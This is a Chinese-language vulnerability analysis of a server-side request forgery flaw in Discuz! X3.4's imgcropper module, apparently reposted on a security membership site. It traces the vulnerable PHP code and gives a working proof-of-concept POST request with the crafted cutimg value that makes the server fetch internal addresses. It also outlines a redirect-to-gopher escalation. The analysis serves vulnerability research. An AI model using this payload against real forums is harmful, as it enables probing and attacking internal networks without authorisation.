Discuz!_X3.4_imgcropper_ssrf

050

# Discuz! X3.4 imgcropper ssrf

============================

一、漏洞简介
————

对 PHP、curl 版本都有特殊的要求,而且要服务端环境接受空 Host
的请求,总的来说比较鸡肋

二、漏洞影响
————

三、复现过程
————

`source/class/class_image.php` `image`类`init`方法:

function init($method, $source, $target, $nosuffix = 0) {
global $_G;

$this->errorcode = 0;
if(empty($source)) {
return -2;
}
$parse = parse_url($source);
if(isset($parse[‘host’])) {
if(empty($target)) {
return -2;
}
$data = dfsockopen($source);
$this->tmpfile = $source = tempnam($_G[‘setting’][‘attachdir’].’./temp/’, ‘tmpimg_’);
if(!$data || $source === FALSE) {
return -2;
}
file_put_contents($source, $data);
}
……
}

再找哪些地方调用了`image`类的`init`方法,发现`image`类的`Thumb`、`Cropper`、`Watermark`方法都调用了`init`。比如`Thumb`:

function Thumb($source, $target, $thumbwidth, $thumbheight, $thumbtype = 1, $nosuffix = 0) {
$return = $this->init(‘thumb’, $source, $target, $nosuffix);
……
}

所以再找哪些地方调用了`image`类的`Thumb`方法,最终发现:

`source/module/misc/misc_imgcropper.php` 52-57行:

require_once libfile(‘class/image’);
$image = new image();
$prefix = $_GET[‘picflag’] == 2 ? $_G[‘setting’][‘ftp’][‘attachurl’] : $_G[‘setting’][‘attachurl’];
if(!$image->Thumb($prefix.$_GET[‘cutimg’], $cropfile, $picwidth, $picheight)) {
showmessage(‘imagepreview_errorcode_’.$image->errorcode, null, null, array(‘showdialog’ => true, ‘closetime’ => true));
}

下断点调试发现 `$_G[‘setting’][‘ftp’][‘attachurl’]` 的值为 `/`,而
`$_G[‘setting’][‘attachurl’]` 的值是 `data/attachment/`。所以似乎
`$prefix` 为 `/` 才有 SSRF 利用的可能。

一开始构造 `cutimg=/10.0.1.1/get`,这样 `$url` 的值就为
`//10.0.1.1/get`,按道理来说这应该算是一个正常的
url,但是结果却请求失败了。

仔细跟进 `_dfsockopen` 发现,在 PHP 环境安装有 cURL 时,进入 curl
处理的代码分支,直到这里:

curl_setopt($ch, CURLOPT_URL, $scheme.’://’.($ip ? $ip : $host).($port ? ‘:’.$port : ”).$path);

`$scheme`、`$host`、`$port`、`$path` 都是 `parse_url` 解析 url
参数后的对应的值,而对像 `//10.0.1.1/get` 这样的 url 解析时,`$scheme`
的值是 `null`,因此最后拼接的结果是 `://10.0.1.1/get`,没有协议,curl
最后对这种url的请求会自动在前面加上 `HTTP://`,结果就变成了请求
`HTTP://://10.0.1.1/get`,这种 url 在我的环境中会导致 curl 报错。

所以我去掉了 curl 扩展,让 `_dfsockopen` 函数代码走 socket
发包的流程,踩了 `parse_url` 和 Dz
代码的一些坑点(这里就不展开了,有兴趣的同学调下代码就知道了),最后发现像这样构造可以成功:

cutimg=/:@localhost:9090/dz-imgcropper-ssrf

poc:

POST /misc.php?mod=imgcropper&picflag=2&cutimg=/:@localhost:9090/dz-imgcropper-ssrf HTTP/1.1
Host: ubuntu-trusty.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: xkmD_2132_sid=E5sbVr; xkmD_2132_saltkey=m6Y8022s; xkmD_2132_lastvisit=1521612483; xkmD_2132_lastact=1521624907%09misc.php%09imgcropper; xkmD_2132_home_readfeed=1521616105; xkmD_2132_seccode=1.ecda87c571707d3f92; xkmD_2132_ulastactivity=a0f4A9CWpermv2t0GGOrf8%2BzCf6dZyAoQ3Sto7ORINqJeK4g3xcX; xkmD_2132_auth=40a4BIESn2PZVmGftNQ2%2BD1ImxpYr0HXke37YiChA2ruG6OryhLe0bUg53XKlioysCePIZGEO1jmlB1L4qbo; XG8F_2132_sid=fKyQMr; XG8F_2132_saltkey=U7lxxLwx; XG8F_2132_lastvisit=1521683793; XG8F_2132_lastact=1521699709%09index.php%09; XG8F_2132_ulastactivity=200fir8BflS1t8ODAa3R7YNsZTQ1k262ysLbc9wdHRzbPnMZ%2BOv7; XG8F_2132_auth=3711UP00sKWDx2Vo1DtO17C%2FvDfrelGOrwhtDmwu5vBjiXSHuPaFVJ%2FC%2BQi1mw4v4pJ66jx6otRFKfU03cBy; XG8F_2132_lip=172.16.99.1%2C1521688203; XG8F_2132_nofavfid=1; XG8F_2132_onlineusernum=3; XG8F_2132_sendmail=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

imgcroppersubmit=1&formhash=f8472648

此时 url 即为`//:@localhost:9090/dz-imgcropper-ssrf`。SSRF 请求成功:

![](/static/qingy/Discuz!_X3.4_imgcropper_ssrf/img/rId24.png)

通过这种方式进行构造利用的话,不太需要额外的限制条件(只要求服务端 PHP
环境没有安装 curl 扩展),但是只能发 HTTP GET
请求,并且服务端不跟随跳转。漏洞危害有限。

后来 l3m0n 师傅也独立发现了这个漏洞,并且他发现较高版本的 curl
是可以成功请求 `HTTP://:/` 的,较高版本的 curl 会将这种 url 地址解析到
127.0.0.1 的 80 端口:

![](/static/qingy/Discuz!_X3.4_imgcropper_ssrf/img/rId25.jpg)

最后他再利用之前 PHP `parse_url` 的解析 bug(
[https://bugs.php.net/bug.php?id=73192](https://link.zhihu.com/?target=https%3A//bugs.php.net/bug.php%3Fid%3D73192)
),及利用 `parse_url` 和 curl 对 url 的解析差异,成功进行 302
跳转到任意恶意地址,最后再 302 跳转到 gopher
就做到发送任意数据包。详情可以参考 l3m0n 的博客:

[Discuz x3.4前台SSRF – l3m0n –
博客园](https://link.zhihu.com/?target=https%3A//www.cnblogs.com/iamstudy/articles/discuz_x34_ssrf_1.html)

但是这种利用方式对 PHP、curl 版本都有特殊的要求,而且要服务端环境接受空
Host 的请求。总的来说,imgcropper SSRF 仍然比较鸡肋。

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
国内漏洞库
喜欢就支持一下吧
点赞0 分享
棉花糖的头像-棉花糖会员站年费会员
会员必看手册(20240920版本)-棉花糖会员站
会员必看手册(20240920版本)
会员必看手册(20240920版本)
9月20日 1.4W+
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
3月25日 2959
上心-SRC培训课-棉花糖会员站
上心-SRC培训课
上心-SRC培训课
5月7日 2307
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
6月8日 2148
国庆抽奖,猫咪赞助安全课程300份-棉花糖会员站
国庆抽奖,猫咪赞助安全课程300份
国庆抽奖,猫咪赞助安全课程300份
9月29日 2130
钟北山SRC第七、八、九期-棉花糖会员站
钟北山SRC第七、八、九期
钟北山SRC第七、八、九期
5月9日 2100
相关推荐
海康威视漏洞合集-棉花糖会员站
海康威视漏洞合集
海康威视漏洞合集
6月1日 1019
Fastadmin框架lang任意文件读取-棉花糖会员站
Fastadmin框架lang任意文件读取
Fastadmin框架lang任意文件读取
6月16日 551
金蝶 EAS 反序列化 RCE-棉花糖会员站
金蝶 EAS 反序列化 RCE
金蝶 EAS 反序列化 RCE
10月11日 546
eking管理易Html5Upload接口 任意文件上传-棉花糖会员站
eking管理易Html5Upload接口 任意文件上传
eking管理易Html5Upload接口 任意文件上传
10月16日 517
深圳市锐明技术股份有限公司Mangrove系统 任意用户添加-棉花糖会员站
深圳市锐明技术股份有限公司Mangrove系统 任意用户添加
深圳市锐明技术股份有限公司Mangrove系统 任意用户添加
10月11日 513
Cloudlog delete_oqrs_line 未授权SQL注入-棉花糖会员站
Cloudlog delete_oqrs_line 未授权SQL注入
Cloudlog delete_oqrs_line 未授权SQL注入
10月16日 494
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站年费会员
大华-智能物联综合管理平台-random-远程命令执行
【补发】C2工具vshell最新4.9.3版下载(带永久license)
外面流传的2024小迪99集残缺版
迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取
致远OA后台表单导入ajax.do任意文件写入
数字通云平台智慧政务系统index接口 Sql注入
最近一周热门文章

1cs提权插件PostExpKit-202410(来源:潇湘信安)

棉花糖的头像-棉花糖会员站年费会员10月13日
99991942

2xscan xss漏扫工具

棉花糖的头像-棉花糖会员站年费会员10月13日
9999757

3红队VS蓝队:网络攻防实战技术解析随书资源

棉花糖的头像-棉花糖会员站年费会员10月13日
9999540

4eking管理易Html5Upload接口 任意文件上传

棉花糖的头像-棉花糖会员站年费会员10月16日
9999517

5一些安全技术相关文档存档

棉花糖的头像-棉花糖会员站年费会员10月14日
9999506

6Cloudlog delete_oqrs_line 未授权SQL注入

棉花糖的头像-棉花糖会员站年费会员10月16日
9999494
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密